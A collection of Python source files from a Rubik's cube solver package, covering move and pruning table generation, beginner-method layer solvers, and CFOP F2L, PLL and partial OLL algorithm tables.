self.parity = self.parityMove[self.parity][m]
self.FRtoBR = self.FRtoBR_Move[self.FRtoBR][m]
self.URFtoDLF = self.URFtoDLF_Move[self.URFtoDLF][m]
self.URtoUL = self.URtoUL_Move[self.URtoUL][m]
self.UBtoDF = self.UBtoDF_Move[self.UBtoDF][m]
if self.URtoUL < 336 and self.UBtoDF < 336: # updated only if UR,UF,UL,UB,DR,DF
# are not in UD-slice
self.URtoDF = self.MergeURtoULandUBtoDF[self.URtoUL][self.UBtoDF]
## Init more static values of class CubieCube
def read_or_func_list(file_name, func):
abspath = os.path.join(os.path.dirname(os.path.abspath(__file__)), file_name)
if os.path.exists(abspath):
return list(map(int, list(map(str.strip, open(abspath).read().split(',')))))
else:
ret = func()
open(abspath, 'w').write(','.join(str(c) for c in ret))
return ret
def read_or_func_matrix(file_name, func):
abspath = os.path.join(os.path.dirname(os.path.abspath(__file__)), file_name)
if os.path.exists(abspath):
return [list(map(int, list(map(str.strip, l.split(','))))) for l in open(abspath)]
else:
ret = func()
open(abspath, 'w').write('\n'.join(','.join(str(c) for c in l) for l in ret))
return ret
def build_twist_move():
twist_move = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_TWIST )]
a = CubieCube()
for i in range(CoordCube.N_TWIST):
a.setTwist(i)
for j in range(6):
for k in range(3):
a.cornerMultiply(CubieCube.moveCube[j])
twist_move[i][ (3 * j) + k ] = a.getTwist()
a.cornerMultiply(CubieCube.moveCube[j]) # 4.faceturn restores
return twist_move
def build_flip_move():
flip_move = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_FLIP )]
a = CubieCube()
for i in range(CoordCube.N_FLIP):
a.setFlip(i)
for j in range(6):
for k in range(3):
a.edgeMultiply(CubieCube.moveCube[j])
flip_move[i][ 3 * j + k ] = a.getFlip()
a.edgeMultiply(CubieCube.moveCube[j])
return flip_move
def build_urf_to_dlf():
urf_to_dlf = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_URFtoDLF )]
a = CubieCube()
for i in range(CoordCube.N_URFtoDLF):
a.setURFtoDLF(i)
for j in range(6):
for k in range(3):
a.cornerMultiply(CubieCube.moveCube[j])
urf_to_dlf[i][ 3 * j + k ] = a.getURFtoDLF()
a.cornerMultiply(CubieCube.moveCube[j])
return urf_to_dlf
def build_fr_to_br():
fr_to_br = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_FRtoBR )]
a = CubieCube()
for i in range(CoordCube.N_FRtoBR):
a.setFRtoBR(i)
for j in range(6):
for k in range(3):
a.edgeMultiply(CubieCube.moveCube[j])
fr_to_br[i][ 3 * j + k ] = a.getFRtoBR()
a.edgeMultiply(CubieCube.moveCube[j])
return fr_to_br
def build_ur_to_df():
ur_to_df = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_URtoDF )]
a = CubieCube()
for i in range(CoordCube.N_URtoDF):
a.setURtoDF(i)
for j in range(6):
for k in range(3):
a.edgeMultiply(CubieCube.moveCube[j])
ur_to_df[i][ 3 * j + k ] = a.getURtoDF()
a.edgeMultiply(CubieCube.moveCube[j])
return ur_to_df
def build_ur_to_ul():
ur_to_ul = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_URtoUL )]
a = CubieCube()
for i in range(CoordCube.N_URtoUL):
a.setURtoUL(i)
for j in range(6):
for k in range(3):
a.edgeMultiply(CubieCube.moveCube[j])
ur_to_ul[i][ 3 * j + k ] = a.getURtoUL()
a.edgeMultiply(CubieCube.moveCube[j])
return ur_to_ul
def build_ub_to_df():
ub_to_df = [[0 for _ in range(CoordCube.N_MOVE)] for _ in range( CoordCube.N_UBtoDF )]
a = CubieCube()
for i in range(CoordCube.N_URtoUL):
a.setUBtoDF(i)
for j in range(6):
for k in range(3):
a.edgeMultiply(CubieCube.moveCube[j])
ub_to_df[i][ 3 * j + k ] = a.getUBtoDF()
a.edgeMultiply(CubieCube.moveCube[j])
return ub_to_df
def build_merge_ur_to_ul_and_ub_to_df():
merge_ur_to_ul_and_ub_to_df = [[0 for _ in range(336)] for _ in range( 336 )]
for uRtoUL in range(336):
for uBtoDF in range(336):
merge_ur_to_ul_and_ub_to_df[uRtoUL][uBtoDF] = CubieCube.getURtoDFs(uRtoUL, uBtoDF)
return merge_ur_to_ul_and_ub_to_df
def build_slice_urf_to_dlf_parity_prun():
slice_urf_to_dlf_parity_prun = [-1] * (CoordCube.N_SLICE2 * CoordCube.N_URFtoDLF * CoordCube.N_PARITY // 2)
CoordCube.setPruning(slice_urf_to_dlf_parity_prun, 0, 0)
done, depth = 1, 0
while done < CoordCube.N_SLICE2 * CoordCube.N_URFtoDLF * CoordCube.N_PARITY:
for i in range(CoordCube.N_SLICE2 * CoordCube.N_URFtoDLF * CoordCube.N_PARITY):
parity = i % 2
URFtoDLF = (i // 2) // CoordCube.N_SLICE2
slicing = (i // 2) % CoordCube.N_SLICE2
if CoordCube.getPruning(slice_urf_to_dlf_parity_prun, i) == depth:
for j in [0, 1, 2, 4, 7, 9, 10, 11, 13, 16]:
newSlice = CoordCube.FRtoBR_Move[slicing][j]
newURFtoDLF = CoordCube.URFtoDLF_Move[URFtoDLF][j]
newParity = CoordCube.parityMove[parity][j]
if CoordCube.getPruning(slice_urf_to_dlf_parity_prun, ((CoordCube.N_SLICE2 * newURFtoDLF) + newSlice) * 2 + newParity) == 0x0f:
CoordCube.setPruning(slice_urf_to_dlf_parity_prun, ((CoordCube.N_SLICE2 * newURFtoDLF) + newSlice) * 2 + newParity, depth + 1)
done += 1
depth += 1
return slice_urf_to_dlf_parity_prun
def build_slice_ur_to_df_parity_prun():
slice_ur_to_df_parity_prun = [-1] * (CoordCube.N_SLICE2 * CoordCube.N_URtoDF * CoordCube.N_PARITY // 2)
CoordCube.setPruning(slice_ur_to_df_parity_prun, 0, 0)
done, depth = 1, 0
while done != (CoordCube.N_SLICE2 * CoordCube.N_URtoDF * CoordCube.N_PARITY):
for i in range(CoordCube.N_SLICE2 * CoordCube.N_URtoDF * CoordCube.N_PARITY):
parity = i % 2
URtoDF = (i // 2) // CoordCube.N_SLICE2
slicing = (i // 2) % CoordCube.N_SLICE2
if depth == CoordCube.getPruning(slice_ur_to_df_parity_prun, i):
for j in [0, 1, 2, 4, 7, 9, 10, 11, 13, 16]:
newSlice = CoordCube.FRtoBR_Move[slicing][j]
newURtoDF = CoordCube.URtoDF_Move[URtoDF][j]
newParity = CoordCube.parityMove[parity][j]
if CoordCube.getPruning(slice_ur_to_df_parity_prun, (CoordCube.N_SLICE2 * newURtoDF + newSlice) * 2 + newParity) == 0x0f:
CoordCube.setPruning(slice_ur_to_df_parity_prun, (CoordCube.N_SLICE2 * newURtoDF + newSlice) * 2 + newParity, depth + 1)
done += 1
depth += 1
return slice_ur_to_df_parity_prun
def build_slice_twist_prun():
slice_twist_prun = [-1] * (CoordCube.N_SLICE1 * CoordCube.N_TWIST // 2 + 1)
CoordCube.setPruning(slice_twist_prun, 0, 0)
done, depth = 1, 0
while done < (CoordCube.N_SLICE1 * CoordCube.N_TWIST):
for i in range(CoordCube.N_SLICE1 * CoordCube.N_TWIST):
twist = i // CoordCube.N_SLICE1
slicing = i % CoordCube.N_SLICE1
if CoordCube.getPruning(slice_twist_prun, i) == depth:
for j in range(18):
newSlice = CoordCube.FRtoBR_Move[slicing * 24][j] // 24
newTwist = CoordCube.twistMove[twist][j]
if CoordCube.getPruning(slice_twist_prun, CoordCube.N_SLICE1 * newTwist + newSlice) == 0x0f:
CoordCube.setPruning(slice_twist_prun, CoordCube.N_SLICE1 * newTwist + newSlice, depth + 1)
done += 1
depth += 1
return slice_twist_prun
def build_slice_flip_prun():
slice_flip_prun = [-1] * (CoordCube.N_SLICE1 * CoordCube.N_FLIP // 2)
CoordCube.setPruning(slice_flip_prun, 0, 0)
done, depth = 1, 0
while done < (CoordCube.N_SLICE1 * CoordCube.N_FLIP):
for i in range(CoordCube.N_SLICE1 * CoordCube.N_FLIP):
flip = i // CoordCube.N_SLICE1
slicing = i % CoordCube.N_SLICE1
if CoordCube.getPruning(slice_flip_prun, i) == depth:
for j in range(18):
newSlice = CoordCube.FRtoBR_Move[slicing * 24][j] // 24
newFlip = CoordCube.flipMove[flip][j]
if CoordCube.getPruning(slice_flip_prun, CoordCube.N_SLICE1 * newFlip + newSlice) == 0x0f:
CoordCube.setPruning(slice_flip_prun, CoordCube.N_SLICE1 * newFlip + newSlice, depth + 1)
done += 1
depth += 1
return slice_flip_prun
CoordCube.twistMove = read_or_func_matrix('twist_move.csv', build_twist_move)
CoordCube.flipMove = read_or_func_matrix('flip_move.csv', build_flip_move)
CoordCube.FRtoBR_Move = read_or_func_matrix('fr_to_br_move.csv', build_fr_to_br)
CoordCube.URFtoDLF_Move = read_or_func_matrix('urf_to_dlf_move.csv', build_urf_to_dlf)
CoordCube.URtoDF_Move = read_or_func_matrix('ur_to_df_move.csv', build_ur_to_df)
CoordCube.URtoUL_Move = read_or_func_matrix('ur_to_ul_move.csv', build_ur_to_ul)
CoordCube.UBtoDF_Move = read_or_func_matrix('ub_to_df_move.csv', build_ub_to_df)
CoordCube.MergeURtoULandUBtoDF = read_or_func_matrix('merge_ur_to_ul_and_ub_to_df_move.csv', build_merge_ur_to_ul_and_ub_to_df)
CoordCube.Slice_URFtoDLF_Parity_Prun = read_or_func_list('slice_urf_to_dlf_parity_prun.csv', build_slice_urf_to_dlf_parity_prun)
CoordCube.Slice_URtoDF_Parity_Prun = read_or_func_list('slice_ur_to_df_parity_prun.csv', build_slice_ur_to_df_parity_prun)
CoordCube.Slice_Twist_Prun = read_or_func_list('slice_twist_prun.csv', build_slice_twist_prun)
CoordCube.Slice_Flip_Prun = read_or_func_list('slice_flip_prun.csv', build_slice_flip_prun) | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/CoordCube/__init__.py | 0.512937 | 0.39158 | __init__.py | pypi |
from .. import Solver
from rubik_solver.Move import Move
class WhiteFaceSolver(Solver):
'''
This solves the down face with the white color
'''
FIRST_STEP = {
'DFR': {
'F': ["R", "U'", "R'"],
'R': ["R", "U", "R'", "U'"]
},
'DFL': {
'F': ["L'", "U", "L", "U'"],
'L': ["L'", "U'", "L"],
'D': ["L'", "U'", "L"]
},
'BDL': {
'B': ["B'", "U2", "B"],
'D': ["B'", "U2", "B"],
'L': ["B'", "U", "B", "U2"]
},
'BDR': {
'B': ["B", "U", "B'"],
'D': ["B", "U", "B'"],
'R': ["B", "U'", "B'", "U"]
},
'BRU': {
'B': ["U"],
'R': ["U"],
'U': ["U"],
},
'BLU': {
'B': ["U2"],
'L': ["U2"],
'U': ["U2"],
},
'FLU': {
'F': ["U'"],
'L': ["U'"],
'U': ["U'"],
}
}
SECOND_STEP = {
'F': ["F'", "U'", "F"],
'R': ["R", "U", "R'"],
'U': ["R", "U2", "R'", "U'", "R", "U", "R'"]
}
@staticmethod
def first_step(goal_cubie, white_facing):
try:
solution = WhiteFaceSolver.FIRST_STEP[goal_cubie][white_facing]
except KeyError:
solution = []
return solution
@staticmethod
def second_step(white_facing):
try:
solution = WhiteFaceSolver.SECOND_STEP[white_facing]
except KeyError:
solution = []
return solution
def solution(self):
solution = []
# There are 4 down-corners
for _ in range(4):
front_color = self.cube.cubies['F'].facings['F']
right_color = self.cube.cubies['R'].facings['R']
goal_cubie = self.cube.search_by_colors('W', front_color, right_color)
goal_cubie_obj = self.cube.cubies[goal_cubie]
step_solution = WhiteFaceSolver.first_step(goal_cubie, goal_cubie_obj.color_facing('W'))
for move in step_solution:
self.cube.move(Move(move))
# If corner is not already well placed and oriented, continue
if len(step_solution) > 0 or goal_cubie != 'DFR':
# Cubie is at FRU, place it at DRU with correct orientation
solution.extend(step_solution)
step_solution = WhiteFaceSolver.second_step(self.cube.cubies['FRU'].color_facing('W'))
for move in step_solution:
self.cube.move(Move(move))
solution.extend(step_solution)
# Cubie is placed, move to next
solution.append('Y')
self.cube.move(Move('Y'))
return solution | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/Beginner/WhiteFaceSolver.py | 0.591841 | 0.319135 | WhiteFaceSolver.py | pypi |
from .. import Solver
from rubik_solver.Move import Move
class SecondLayerSolver(Solver):
def is_solved(self):
# Check if edges FL, FR, BL and BR are correctly placed and oriented
front_color = self.cube.cubies['F'].facings['F']
back_color = self.cube.cubies['B'].facings['B']
left_color = self.cube.cubies['L'].facings['L']
right_color = self.cube.cubies['R'].facings['R']
success = self.cube.cubies['FL'].facings['F'] == front_color and self.cube.cubies['FL'].facings['L'] == left_color
success = success and self.cube.cubies['FR'].facings['F'] == front_color and self.cube.cubies['FR'].facings['R'] == right_color
success = success and self.cube.cubies['BL'].facings['B'] == back_color and self.cube.cubies['BL'].facings['L'] == left_color
success = success and self.cube.cubies['BR'].facings['B'] == back_color and self.cube.cubies['BR'].facings['R'] == right_color
return success
def move(self, move, solution):
solution.append(move)
self.cube.move(Move(move))
def solution(self):
solution = []
# While there are pending cubies to place
step = 0
while True:
if self.is_solved():
break
if step > 6:
# We have made a full step to the cube and haven't found a well cubie to place
# and cube isn't solved yet
break
current_cubie = self.cube.cubies['FU']
# If not yellow on FL, we place it
step += 1
if current_cubie.color_facing('Y') is None:
step = 0
front_color = current_cubie.facings['F']
correct_face = self.cube.search_by_colors(front_color)
if correct_face == 'L':
self.move("U", solution)
self.move("Y'", solution)
elif correct_face == 'R':
self.move("U'", solution)
self.move("Y", solution)
elif correct_face == 'B':
self.move("U2", solution)
self.move("Y2", solution)
# Right now we are able to use the F2L or F2R algorithms
if self.cube.cubies['FU'].facings['U'] == self.cube.cubies['R'].facings['R']:
# F2R: U R U' R' U' F' U F
self.move("U", solution)
self.move("R", solution)
self.move("U'", solution)
self.move("R'", solution)
self.move("U'", solution)
self.move("F'", solution)
self.move("U", solution)
self.move("F", solution)
else:
# F2L: U' L' U L U F U' F'
self.move("U'", solution)
self.move("L'", solution)
self.move("U", solution)
self.move("L", solution)
self.move("U", solution)
self.move("F", solution)
self.move("U'", solution)
self.move("F'", solution)
# There is a Yellow in FU and FR is bad placed / oriented
else:
front_color = self.cube.cubies['F'].facings['F']
right_color = self.cube.cubies['R'].facings['R']
move_fr = self.cube.cubies['FR'].facings['F'] != front_color
move_fr = move_fr or self.cube.cubies['FR'].facings['R'] != right_color
move_fr = move_fr and self.cube.cubies['FR'].color_facing('Y') is None
# Apply F2R
if move_fr:
self.move("U", solution)
self.move("R", solution)
self.move("U'", solution)
self.move("R'", solution)
self.move("U'", solution)
self.move("F'", solution)
self.move("U", solution)
self.move("F", solution)
self.move("Y", solution)
return solution | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/Beginner/SecondLayerSolver.py | 0.652463 | 0.276809 | SecondLayerSolver.py | pypi |
from .. import Solver
from rubik_solver.Move import Move
class WhiteCrossSolver(Solver):
'''
This class solves the white cross on the down face
'''
STEPS = {
'U': {
'R': [],
'L': [],
'F': [],
'B': [],
},
'D': {
'R': ['R2'],
'L': ['L2'],
'F': ['F2'],
'B': ['B2']
},
'F': {
'U': ["F", "R", "U'", "R'", "F'"],
'D': ["F'", "R", "U'", "R'"],
'R': ["R", "U", "R'"],
'L': ["L'", "U'", "L"],
},
'B': {
'U': ["B", "L", "U'", "L'", "B'"],
'D': ["B", "R'", "U", "R"],
'R': ["R'", "U", "R"],
'L': ["L", "U'", "L'"],
},
'L': {
'U': ["L", "F", "U'", "F'", "L'"],
'D': ["L'", "F", "U'", "F'"],
'F': ["F", "U'", "F'"],
'B': ["B'", "U", "B"],
},
'R': {
'U': ["R'", "F'", "U", "F", "R"],
'D': ["R", "F'", "U", "F"],
'F': ["F'", "U", "F"],
'B': ["B", "U'", "B'"],
}
}
@staticmethod
def first_step(white_facing, color_facing):
return WhiteCrossSolver.STEPS[white_facing.upper()][color_facing.upper()]
def solution(self):
solution = []
for color in 'RGOB':
cubie_position = self.cube.search_by_colors('W', color)
orig_cubie = self.cube.cubies[cubie_position]
white_facing = orig_cubie.color_facing('W')
color_facing = orig_cubie.color_facing(color)
step_solution = WhiteCrossSolver.first_step(white_facing, color_facing)
# First goal is to put white sticker on top face
for m in step_solution:
self.cube.move(Move(m))
solution.extend(step_solution)
# Second goal is to place the cubie on the top over its place
while self.cube.cubies['FU'].facings['U'] != 'W' or self.cube.cubies['FU'].facings['F'] != color:
solution.append('U')
self.cube.move(Move('U'))
# Third goal will be a F2 movement
solution.append("F2")
self.cube.move(Move("F2"))
solution.append('Y')
self.cube.move(Move("Y"))
return solution | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/Beginner/WhiteCrossSolver.py | 0.565059 | 0.3492 | WhiteCrossSolver.py | pypi |
from .. import Solver
from rubik_solver.Move import Move
class YellowFaceSolver(Solver):
def apply_edges_algorithm(self, solution):
for move in ["R", "U", "R'", "U", "R", "U2", "R'"]:
self.move(move, solution)
def apply_corner_place_algorithm(self, solution):
for move in ["U", "R", "U'", "L'", "U", "R'", "U'", "L"]:
self.move(move, solution)
def apply_corner_orient_algorithm(self, solution):
for move in ["R'", "D'", "R", "D"]:
self.move(move, solution)
def edges_are_placed(self):
color_order = 'GOBR'
front_color = str(self.cube.cubies['FU'].facings['F'])
back_color = str(self.cube.cubies['BU'].facings['B'])
left_color = str(self.cube.cubies['LU'].facings['L'])
right_color = str(self.cube.cubies['RU'].facings['R'])
actual_order = [front_color, right_color, back_color, left_color]
green_index = actual_order.index('G')
actual_order = ['G']+actual_order[green_index+1:]+actual_order[:green_index]
return ''.join(actual_order) == color_order
def corner_is_placed(self, corner):
corner = self.cube.cubies[corner]
related_edges = ''.join(corner.faces).replace('U', '')
for edge in related_edges:
if self.cube.cubies[edge+'U'].facings[edge] not in corner.colors:
return False
return True
def placed_corners(self):
return [c for c in ['FRU', 'FLU', 'BRU', 'BLU'] if self.corner_is_placed(c)]
def move(self, m, solution):
self.cube.move(Move(m))
solution.append(m)
def solution(self):
solution = []
# Locate edge with front_color
turns = 0
while not self.edges_are_placed():
turns += 1
# If we are rotating over the same solutions, apply twice algorithm to break cycle
if turns >= 4:
turns = 0
self.apply_edges_algorithm(solution)
self.apply_edges_algorithm(solution)
self.move("Y'", solution)
# Place corner in their place
while True:
placed_corners = self.placed_corners()
if len(placed_corners) == 4:
break
# If only 1 corner is well placed, place it at FRU and perform algorithm once or twice
elif len(placed_corners) == 1:
while self.placed_corners()[0] != 'FRU':
self.move("U", solution)
self.apply_corner_place_algorithm(solution)
# If no placed corners, perform algorithm and 1 corner will be placed
else:
self.apply_corner_place_algorithm(solution)
# Orient corners
for _ in range(4):
# Get corner at FRU
corner = self.cube.cubies['FRU']
while corner.facings['U'] != 'Y':
# Apply corner orientation algorithm
self.apply_corner_orient_algorithm(solution)
self.move("U", solution)
# Finally, align the top layer
while self.cube.cubies['F'].facings['F'] != self.cube.cubies['FU'].facings['F']:
self.move("U", solution)
return solution | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/Beginner/YellowFaceSolver.py | 0.784402 | 0.343975 | YellowFaceSolver.py | pypi |
from rubik_solver.Move import Move
from .. import Solver
class PLLSolver(Solver):
STEPS = {
"810345672": ["X", "R'", "U", "R'", "D2", "R", "U'", "R'", "D2", "R2", "X'"],
"018345276": ["X'", "R", "U'", "R", "D2", "R'", "U", "R", "D2", "R2", "X"],
"012743658": ["R2", "U", "R", "U", "R'", "U'", "R'", "U'", "R'", "U", "R'"],
"012547638": ["R", "U'", "R", "U", "R", "U", "R", "U'", "R'", "U'", "R2"],
"072543618": ["M2", "U", "M2", "U2", "M2", "U", "M2"],
"018543672": ["R", "U", "R'", "U'", "R'", "F", "R2", "U'", "R'", "U'", "R", "U", "R'", "F'"],
"230145678": ["R'", "U", "L'", "U2", "R", "U'", "R'", "U2", "R", "L", "U'"],
"018347652": ["R", "U", "R'", "F'", "R", "U", "R'", "U'", "R'", "F", "R2", "U'", "R'", "U'"],
"210745638": ["L", "U2", "L'", "U2", "L", "F'", "L'", "U'", "L", "U", "L", "F", "L2", "U"],
"210347658": ["R'", "U2", "R", "U2", "R'", "F", "R", "U", "R'", "U'", "R'", "F'", "R2", "U'"],
"852341670": ["R'", "U", "R'", "Y", "U'", "R'", "F'", "R2", "U'", "R'", "U", "R'", "F", "R", "F"],
"650143278": ["R2", "Y", "D", "R'", "U", "R'", "U'", "R", "Y'", "D'", "R2", "Y'", "R'", "U", "R"],
"832745016": ["R'", "U'", "R", "Y", "R2", "Y", "D", "R'", "U", "R", "U'", "R", "Y'", "D'", "R2"],
"812743056": ["R2", "Y'", "D'", "R", "U'", "R", "U", "R'", "Y", "D", "R2", "Y", "R", "U'", "R'"],
"670145238": ["R", "U", "R'", "Y'", "R2", "Y'", "D'", "R", "U'", "R'", "U", "R'", "Y", "D", "R2"],
"012543876": ["R'", "U2", "R'", "Y", "U'", "R'", "F'", "R2", "U'", "R'", "U", "R'", "F", "R", "U'", "F"],
"032147658": ["M2", "U", "M2", "U", "M'", "U2", "M2", "U2", "M'", "U2"],
"832145670": ["F", "R", "U'", "R'", "U'", "R", "U", "R'", "F'", "R", "U", "R'", "U'", "R'", "F", "R", "F'"],
"872345610": ["L", "U'", "R", "U2", "L'", "U", "R'", "L", "U'", "R", "U2", "L'", "U", "R'", "U"],
"076345218": ["R'", "U", "L'", "U2", "R", "U'", "L", "R'", "U", "L'", "U2", "R", "U'", "L", "U'"],
"618345072": ["X'", "R", "U'", "R'", "D", "R", "U", "R'", "D'", "R", "U", "R'", "D", "R", "U'", "R'", "D'", "X"]
}
@staticmethod
def get_orientations(cube):
cubies = ['BLU', 'BU', 'BRU', 'LU', 'U', 'RU', 'FLU', 'FU', 'FRU']
orientation = []
for cubie in cubies:
o = PLLSolver.get_correct_cubie(cube, cubie)
orientation.append(str(cubies.index(o)))
return ''.join(orientation)
def move(self, s, solution):
self.cube.move(Move(s))
solution.append(s)
@staticmethod
def get_correct_cubie(cube, cubie):
colors = [cube.cubies[c].facings[c].color for c in cubie.replace('U', '')]
return cube.search_by_colors('Y', *colors)
def solution(self):
solution = []
while True:
for _ in range(4):
self.move('U', solution)
for _ in range(4):
self.move('Y', solution)
orientation = PLLSolver.get_orientations(self.cube)
if orientation in PLLSolver.STEPS:
for s in PLLSolver.STEPS[orientation]:
self.move(s, solution)
return solution
# Apply shortest and expect to be solvable after that
for s in PLLSolver.STEPS["072543618"]:
self.move(s, solution)
return [] | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/CFOP/PLLSolver.py | 0.549641 | 0.382026 | PLLSolver.py | pypi |
from rubik_solver.Move import Move
from .. import Solver
from ..Beginner.WhiteFaceSolver import WhiteFaceSolver
class F2LSolver(Solver):
STEPS = {
'FUR': {
'UB': ["R", "U", "R'"],
'FU': ["U'", "F'", "U", "F"],
'FR': ["U", "F'", "U", "F", "U", "F'", "U2", "F"],
'RF': ["U", "F'", "U'", "F", "Y", "U'", "F", "U", "F'", "Y'"],
'RU': ["R", "U'", "R'", "U", "Y'", "U", "R'", "U'", "R", "Y"],
'BU': ["U", "F'", "U2", "F", "U", "F'", "U2", "F"],
'LU': ["U", "F'", "U'", "F", "U", "F'", "U2", "F"],
'UR': ["U'", "R", "U'", "R'", "U", "R", "U", "R'"],
'UL': ["U'", "R", "U", "R'", "U", "R", "U", "R'"],
'UF': ["U", "F'", "U2", "F", "U'", "R", "U", "R'"],
},
'URF': {
'LU': ["F'", "U'", "F"],
'UR': ["U", "R", "U'", "R'"],
'FR': ["U'", "R", "U'", "R'", "U'", "R", "U2", "R'"],
'RF': ["U'", "R", "U", "R'", "Y'", "U", "R'", "U'", "R", "Y"],
'UF': ["F'", "U", "F", "U'", "Y", "U'", "F", "U", "F'", "Y'"],
'UL': ["U'", "R", "U2", "R'", "U'", "R", "U2", "R'"],
'UB': ["U'", "R", "U", "R'", "U'", "R", "U2", "R'"],
'FU': ["U", "F'", "U", "F", "U'", "F'", "U'", "F"],
'BU': ["U", "F'", "U'", "F", "U'", "F'", "U'", "F"],
'RU': ["U'", "R", "U2", "R'", "U", "F'", "U'", "F"],
},
'FRD': {
'FU': ["U", "R", "U'", "R'", "U'", "F'", "U", "F"],
'RU': ["U2", "R", "U'", "R'", "U'", "F'", "U", "F"],
'LU': ["R", "U'", "R'", "U'", "F'", "U", "F"],
'BU': ["U'", "R", "U'", "R'", "U'", "F'", "U", "F"],
'UR': ["U'", "F'", "U", "F", "U", "R", "U'", "R'"],
'UL': ["U", "F'", "U", "F", "U", "R", "U'", "R'"],
'UB': ["F'", "U", "F", "U", "R", "U'", "R'"],
'UF': ["U2", "F'", "U", "F", "U", "R", "U'", "R'"],
'RF': ["R", "U'", "R'", "Y'", "U", "R'", "U2", "R", "U", "R'", "U2", "R", "Y"],
'FR': [],
},
'DFR': {
'FU': ["F'", "U", "F", "U'", "F'", "U", "F"],
'UR': ["R", "U", "R'", "U'", "R", "U", "R'"],
'FR': ["R", "U'", "R'", "U", "R", "U2", "R'", "U", "R", "U'", "R'"],
'RF': ["R", "U", "R'", "U'", "R", "U'", "R'", "U", "Y'", "U", "R'", "U'", "R", "Y"],
},
'RDF': {
'FU': ["F'", "U'", "F", "U", "F'", "U'", "F"],
'UR': ["R", "U'", "R'", "U", "R", "U'", "R'"],
'FR': ["R", "U'", "R'", "U'", "R", "U", "R'", "U'", "R", "U2", "R'"],
'RF': ["R", "U'", "R'", "Y'", "U", "R'", "U'", "R", "U'", "R'", "U'", "R", "Y"]
},
'RFU':{
'FR': ["R", "U", "R'", "U'", "R", "U", "R'", "U'", "R", "U", "R'"],
'RF': ["R", "U'", "R'", "Y'", "U", "R'", "U", "R", "Y"],
'UF': ["R", "U", "R'", "U'", "U'", "R", "U", "R'", "U'", "R", "U", "R'"],
'UL': ["U2", "R", "U", "R'", "U", "R", "U'", "R'"],
'UB': ["U", "R", "U2", "R'", "U", "R", "U'", "R'"],
'UR': ["R", "U2", "R'", "U'", "R", "U", "R'"],
'LU': ["U'", "F'", "U2", "F", "U'", "F'", "U", "F"],
'BU': ["U2", "F'", "U'", "F", "U'", "F'", "U", "F"],
'RU': ["Y'", "R'", "U'", "R", "U2", "R'", "U'", "R", "U", "R'", "U'", "R", "Y"],
'FU': ["F'", "U2", "F", "U", "F'", "U'", "F"],
},
}
@staticmethod
def get_step(corner, edge):
'''
This method returns the step to place to 2 cubies in place,
the variables encodes the cubies position and orientation.
corner must be a string with 3 letters, each letter represents
the facing of the colors in the following way:
1st letter: where the front color (cubie F) is facing in the corner to move
2nd letter: where the right color (cubie R) is facing in the corner to move
3rd letter: where the bottom color (cubie B, usually white) is facing in the corner to move
The same applies with the edge variable
'''
return F2LSolver.STEPS[corner][edge]
def move(self, s, solution):
self.cube.move(Move(s))
solution.append(s)
def solution(self):
solution = []
for _ in range(4):
front_color = self.cube.cubies['F'].facings['F'].color
right_color = self.cube.cubies['R'].facings['R'].color
corner = self.cube.search_by_colors(front_color, right_color, 'W')
step_solution = WhiteFaceSolver.first_step(corner, self.cube.cubies[corner].color_facing('W'))
solution.extend(step_solution)
for s in step_solution:
self.cube.move(Move(s))
edge = self.cube.search_by_colors(front_color, right_color)
# If edge is in BL or BR, WAF!, this case is not expected in any manual
if edge == 'BL':
self.move("B'", solution)
self.move("U'", solution)
self.move("B", solution)
elif edge == 'BR':
self.move("B", solution)
self.move("U", solution)
self.move("B'", solution)
elif edge == 'FL':
self.move("L'", solution)
self.move("U'", solution)
self.move("L", solution)
corner = self.cube.search_by_colors(front_color, right_color, 'W')
#Place corner in FRU if needed
if 'U' in corner:
while corner != 'FRU':
self.move("U", solution)
corner = self.cube.search_by_colors(front_color, right_color, 'W')
edge = self.cube.search_by_colors(front_color, right_color)
corner_facings = ''.join([
self.cube.cubies[corner].color_facing(front_color),
self.cube.cubies[corner].color_facing(right_color),
self.cube.cubies[corner].color_facing('W')
])
edge_facings = ''.join([
self.cube.cubies[edge].color_facing(front_color),
self.cube.cubies[edge].color_facing(right_color)
])
step_solution = F2LSolver.get_step(corner_facings, edge_facings)
solution.extend(step_solution)
for s in step_solution:
self.cube.move(Move(s))
self.cube.move(Move("Y"))
solution.append("Y")
return solution | /rubik_solver-0.2.0.tar.gz/rubik_solver-0.2.0/rubik_solver/Solver/CFOP/F2LSolver.py | 0.657098 | 0.337367 | F2LSolver.py | pypi |
from rubik_solver.Move import Move
from .. import Solver
class OLLSolver(Solver):
STEPS = {
"LBRLURLFR": ["R", "U", "B'", "X'", "R", "U", "X2", "R2", "X'", "U'", "R'", "F", "R", "F'"],
"LBRLURFFF": ["R'", "F", "R", "F'", "U2", "R'", "F", "R", "Y'", "R2", "U2", "R"],
"BBRLURLFU": ["Y", "M", "U", "X", "R'", "U2", "X'", "R", "U", "L'", "U", "L", "M'"],
"LBULURFFR": ["R'", "U2", "X", "R'", "U", "R", "U'", "Y", "R'", "U'", "R'", "U", "R'", "F", "Z'"],
"UBBLURLFU": ["R", "U", "R'", "U", "R'", "F", "R", "F'", "U2", "R'", "F", "R", "F'"],
"UBULURUFU": ["M'", "U2", "M", "U2", "M'", "U", "M", "U2", "M'", "U2", "M"],
"UBULURLFR": ["R'", "U2", "F", "R", "U", "R'", "U'", "Y'", "R2", "U2", "X'", "R", "U", "X"],
"BBBLURUFU": ["F", "R", "U", "R'", "U", "Y'", "R'", "U2", "R'", "F", "R", "F'"],
"BURLURFUR": ["R'", "U'", "Y", "L'", "U", "L'", "Y'", "L", "F", "L'", "F", "R"],
"LURLURLUR": ["R", "U'", "Y", "R2", "D", "R'", "U2", "R", "D'", "R2", "Y'", "U", "R'"],
